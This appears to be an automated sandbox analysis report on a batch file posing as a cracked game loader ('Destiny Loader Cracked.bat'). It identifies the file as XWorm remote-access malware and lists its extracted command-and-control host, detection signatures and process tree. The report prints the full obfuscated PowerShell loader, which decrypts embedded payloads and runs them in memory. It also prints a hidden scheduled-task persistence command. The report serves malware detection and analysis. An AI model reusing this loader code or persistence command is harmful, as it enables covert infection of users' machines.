Analysis
-
max time kernel
146s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system -
submitted
03/03/2025, 19:19
Static task
static1
General
-
Target
Destiny Loader Cracked.bat
-
Size
327KB
-
MD5
d0eef460c098ddfab73bffe09b5576f1
-
SHA1
72a9d083d85037abf060c027ceb2f4c7d83b8d42
-
SHA256
94bf91b3fb8d81ca10883351d514dd89c9f953771ec90a2c3571e586c0ece07a
-
SHA512
eaf4b8a20787685ac516f8c8fa27052df7e8100180cdbb16fdbc1dcdc33ede7623ed1ce1abbd24146bc2dc63c4e55fb36957dc731b005d71fd781e1a1b72e8d3
-
SSDEEP
6144:fS/P9VWTPTlLWWUY+GVH0I2mjYTNZTNSq78e89aOki5M:YP/2PTlLVUI2mMTTn8e89Ii5M
Malware Config
Extracted
xworm
5.0
ciad4zftx.localto.net:6536
fz5G9hEIprTL3zDO
-
Install_directory
%ProgramData%
-
install_file
System.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3016-50-0x00000290AF100000-0x00000290AF11A000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 3016 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4576 powershell.exe 5116 powershell.exe 3016 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4576 powershell.exe 4576 powershell.exe 5116 powershell.exe 5116 powershell.exe 3016 powershell.exe 3016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4576 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeIncreaseQuotaPrivilege 5116 powershell.exe Token: SeSecurityPrivilege 5116 powershell.exe Token: SeTakeOwnershipPrivilege 5116 powershell.exe Token: SeLoadDriverPrivilege 5116 powershell.exe Token: SeSystemProfilePrivilege 5116 powershell.exe Token: SeSystemtimePrivilege 5116 powershell.exe Token: SeProfSingleProcessPrivilege 5116 powershell.exe Token: SeIncBasePriorityPrivilege 5116 powershell.exe Token: SeCreatePagefilePrivilege 5116 powershell.exe Token: SeBackupPrivilege 5116 powershell.exe Token: SeRestorePrivilege 5116 powershell.exe Token: SeShutdownPrivilege 5116 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeSystemEnvironmentPrivilege 5116 powershell.exe Token: SeRemoteShutdownPrivilege 5116 powershell.exe Token: SeUndockPrivilege 5116 powershell.exe Token: SeManageVolumePrivilege 5116 powershell.exe Token: 33 5116 powershell.exe Token: 34 5116 powershell.exe Token: 35 5116 powershell.exe Token: 36 5116 powershell.exe Token: SeIncreaseQuotaPrivilege 5116 powershell.exe Token: SeSecurityPrivilege 5116 powershell.exe Token: SeTakeOwnershipPrivilege 5116 powershell.exe Token: SeLoadDriverPrivilege 5116 powershell.exe Token: SeSystemProfilePrivilege 5116 powershell.exe Token: SeSystemtimePrivilege 5116 powershell.exe Token: SeProfSingleProcessPrivilege 5116 powershell.exe Token: SeIncBasePriorityPrivilege 5116 powershell.exe Token: SeCreatePagefilePrivilege 5116 powershell.exe Token: SeBackupPrivilege 5116 powershell.exe Token: SeRestorePrivilege 5116 powershell.exe Token: SeShutdownPrivilege 5116 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeSystemEnvironmentPrivilege 5116 powershell.exe Token: SeRemoteShutdownPrivilege 5116 powershell.exe Token: SeUndockPrivilege 5116 powershell.exe Token: SeManageVolumePrivilege 5116 powershell.exe Token: 33 5116 powershell.exe Token: 34 5116 powershell.exe Token: 35 5116 powershell.exe Token: 36 5116 powershell.exe Token: SeIncreaseQuotaPrivilege 5116 powershell.exe Token: SeSecurityPrivilege 5116 powershell.exe Token: SeTakeOwnershipPrivilege 5116 powershell.exe Token: SeLoadDriverPrivilege 5116 powershell.exe Token: SeSystemProfilePrivilege 5116 powershell.exe Token: SeSystemtimePrivilege 5116 powershell.exe Token: SeProfSingleProcessPrivilege 5116 powershell.exe Token: SeIncBasePriorityPrivilege 5116 powershell.exe Token: SeCreatePagefilePrivilege 5116 powershell.exe Token: SeBackupPrivilege 5116 powershell.exe Token: SeRestorePrivilege 5116 powershell.exe Token: SeShutdownPrivilege 5116 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeSystemEnvironmentPrivilege 5116 powershell.exe Token: SeRemoteShutdownPrivilege 5116 powershell.exe Token: SeUndockPrivilege 5116 powershell.exe Token: SeManageVolumePrivilege 5116 powershell.exe Token: 33 5116 powershell.exe Token: 34 5116 powershell.exe Token: 35 5116 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 672 wrote to memory of 4576 672 cmd.exe 78 PID 672 wrote to memory of 4576 672 cmd.exe 78 PID 4576 wrote to memory of 5116 4576 powershell.exe 79 PID 4576 wrote to memory of 5116 4576 powershell.exe 79 PID 4576 wrote to memory of 2416 4576 powershell.exe 82 PID 4576 wrote to memory of 2416 4576 powershell.exe 82 PID 2416 wrote to memory of 4604 2416 WScript.exe 83 PID 2416 wrote to memory of 4604 2416 WScript.exe 83 PID 4604 wrote to memory of 3016 4604 cmd.exe 85 PID 4604 wrote to memory of 3016 4604 cmd.exe 85
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Destiny Loader Cracked.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('St/Wt6vqm9kaTmxnEI7FVwFJ79tdiegvPTsnH2ymwRU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cXqlF3UWhJzCcuDvG48+Og=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rsudL=New-Object System.IO.MemoryStream(,$param_var); $nFnkD=New-Object System.IO.MemoryStream; $wnAvt=New-Object System.IO.Compression.GZipStream($rsudL, [IO.Compression.CompressionMode]::Decompress); $wnAvt.CopyTo($nFnkD); $wnAvt.Dispose(); $rsudL.Dispose(); $nFnkD.Dispose(); $nFnkD.ToArray();}function execute_function($param_var,$param2_var){ $lNmdI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CXjmD=$lNmdI.EntryPoint; $CXjmD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Destiny Loader Cracked.bat';$iYYFP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Destiny Loader Cracked.bat').Split([Environment]::NewLine);foreach ($DzSDP in $iYYFP) { if ($DzSDP.StartsWith(':: ')) { $HXwqb=$DzSDP.Substring(3); break; }}$payloads_var=[string[]]$HXwqb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_762_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_762.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_762.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_762.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('St/Wt6vqm9kaTmxnEI7FVwFJ79tdiegvPTsnH2ymwRU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cXqlF3UWhJzCcuDvG48+Og=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rsudL=New-Object System.IO.MemoryStream(,$param_var); $nFnkD=New-Object System.IO.MemoryStream; $wnAvt=New-Object System.IO.Compression.GZipStream($rsudL, [IO.Compression.CompressionMode]::Decompress); $wnAvt.CopyTo($nFnkD); $wnAvt.Dispose(); $rsudL.Dispose(); $nFnkD.Dispose(); $nFnkD.ToArray();}function execute_function($param_var,$param2_var){ $lNmdI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CXjmD=$lNmdI.EntryPoint; $CXjmD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_762.bat';$iYYFP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_762.bat').Split([Environment]::NewLine);foreach ($DzSDP in $iYYFP) { if ($DzSDP.StartsWith(':: ')) { $HXwqb=$DzSDP.Substring(3); break; }}$payloads_var=[string[]]$HXwqb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3016
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
327KB
MD5d0eef460c098ddfab73bffe09b5576f1
SHA172a9d083d85037abf060c027ceb2f4c7d83b8d42
SHA25694bf91b3fb8d81ca10883351d514dd89c9f953771ec90a2c3571e586c0ece07a
SHA512eaf4b8a20787685ac516f8c8fa27052df7e8100180cdbb16fdbc1dcdc33ede7623ed1ce1abbd24146bc2dc63c4e55fb36957dc731b005d71fd781e1a1b72e8d3
-
Filesize
115B
MD58de39b6a5c6b7114695d294613984340
SHA1ac49f8ec4894f26829aef181de6ab2b38b21a1be
SHA25638479773e3eb6a5cc1c44ff9adc0eea5fcbee68a68a9565c1d260864d87ab9e6
SHA51223e22edca4d2d26aab22cb497299ac62e165549cb619a119a35743512ce1dd7c2a22da074b40285561c9a57088dd583c1626a24e972fc30c2ce6dbbe77ae522b